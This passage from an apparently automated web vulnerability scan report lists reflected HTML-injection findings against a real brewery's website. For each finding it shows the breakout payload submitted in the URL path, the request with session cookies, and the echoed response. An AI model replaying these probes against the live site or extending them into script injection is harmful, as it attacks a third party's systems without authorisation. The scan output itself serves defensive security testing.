...[SNIP]...
<body id="process7a9d3"><a>dfa1e21e09f_page" class="process7a9d3">
...[SNIP]...

1.358. http://www.ninkasibrewing.com/process/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /process/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92128"><a>951cf91d628 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process92128"><a>951cf91d628/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="process92128"><a>951cf91d628_page" class="process92128">
...[SNIP]...

1.359. http://www.ninkasibrewing.com/process/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /process/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da51d"><a>b4ca083e972 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /processda51d"><a>b4ca083e972/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="processda51d"><a>b4ca083e972_page" class="processda51d">
...[SNIP]...

1.360. http://www.ninkasibrewing.com/process/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /process/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 464a8"><a>b51a0c71a0d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process464a8"><a>b51a0c71a0d/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 500 Internal Server Error
Date: Sun, 21 Nov 2010 21:54:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="process464a8"><a>b51a0c71a0d_page" class="process464a8">
...[SNIP]...

1.361. http://www.ninkasibrewing.com/process/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /process/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e00c"><a>fc68d60c0f3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process6e00c"><a>fc68d60c0f3/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="process6e00c"><a>fc68d60c0f3_page" class="process6e00c">
...[SNIP]...

1.362. http://www.ninkasibrewing.com/process/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /process/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3479d"><a>5af2bfd9467 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process3479d"><a>5af2bfd9467/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="process3479d"><a>5af2bfd9467_page" class="process3479d">
...[SNIP]...

1.363. http://www.ninkasibrewing.com/process/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /process/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ec8c"><a>3f99d872435 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /process8ec8c"><a>3f99d872435/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:17 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="process8ec8c"><a>3f99d872435_page" class="process8ec8c">
...[SNIP]...

1.364. http://www.ninkasibrewing.com/tasting_room/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /tasting_room/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 382ed"><a>c4b55899033 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room382ed"><a>c4b55899033/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="tasting_room382ed"><a>c4b55899033_page" class="tasting_room382ed">
...[SNIP]...

1.365. http://www.ninkasibrewing.com/tasting_room/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /tasting_room/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e70ae"><a>5db925a41c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_roome70ae"><a>5db925a41c/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13222

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="tasting_roome70ae"><a>5db925a41c_page" class="tasting_roome70ae">
...[SNIP]...

1.366. http://www.ninkasibrewing.com/tasting_room/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /tasting_room/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a066"><a>6e1291e293b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room8a066"><a>6e1291e293b/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="tasting_room8a066"><a>6e1291e293b_page" class="tasting_room8a066">
...[SNIP]...

1.367. http://www.ninkasibrewing.com/tasting_room/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /tasting_room/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7a74a"><a>886f2be4379 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room7a74a"><a>886f2be4379/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:19 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="tasting_room7a74a"><a>886f2be4379_page" class="tasting_room7a74a">
...[SNIP]...

1.368. http://www.ninkasibrewing.com/tasting_room/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /tasting_room/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b45d"><a>58a95621c51 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room2b45d"><a>58a95621c51/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="tasting_room2b45d"><a>58a95621c51_page" class="tasting_room2b45d">
...[SNIP]...

1.369. http://www.ninkasibrewing.com/tasting_room/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /tasting_room/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63aa8"><a>d20e97deba5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room63aa8"><a>d20e97deba5/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="tasting_room63aa8"><a>d20e97deba5_page" class="tasting_room63aa8">
...[SNIP]...

1.370. http://www.ninkasibrewing.com/tasting_room/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /tasting_room/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 229d9"><a>4dc96b2a07e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /tasting_room229d9"><a>4dc96b2a07e/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13224

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="tasting_room229d9"><a>4dc96b2a07e_page" class="tasting_room229d9">
...[SNIP]...

1.371. http://www.ninkasibrewing.com/twitter/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /twitter/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d9914"><a>7fd5a5d0d72 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterd9914"><a>7fd5a5d0d72/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="twitterd9914"><a>7fd5a5d0d72_page" class="twitterd9914">
...[SNIP]...

1.372. http://www.ninkasibrewing.com/twitter/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /twitter/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eb286"><a>ad9894bb919 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twittereb286"><a>ad9894bb919/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="twittereb286"><a>ad9894bb919_page" class="twittereb286">
...[SNIP]...

1.373. http://www.ninkasibrewing.com/twitter/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /twitter/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f89ac"><a>3fe204e99a2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterf89ac"><a>3fe204e99a2/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="twitterf89ac"><a>3fe204e99a2_page" class="twitterf89ac">
...[SNIP]...

1.374. http://www.ninkasibrewing.com/twitter/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /twitter/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe021"><a>ac6878c8598 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitterfe021"><a>ac6878c8598/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="twitterfe021"><a>ac6878c8598_page" class="twitterfe021">
...[SNIP]...

1.375. http://www.ninkasibrewing.com/twitter/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /twitter/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b875"><a>10326ad19f9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /twitter5b875"><a>10326ad19f9/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:54:31 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13214

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="twitter5b875"><a>10326ad19f9_page" class="twitter5b875">
...[SNIP]...

1.376. http://www.ninkasibrewing.com/twitter/content/js/combined.css [REST URL parameter 1]

Summary
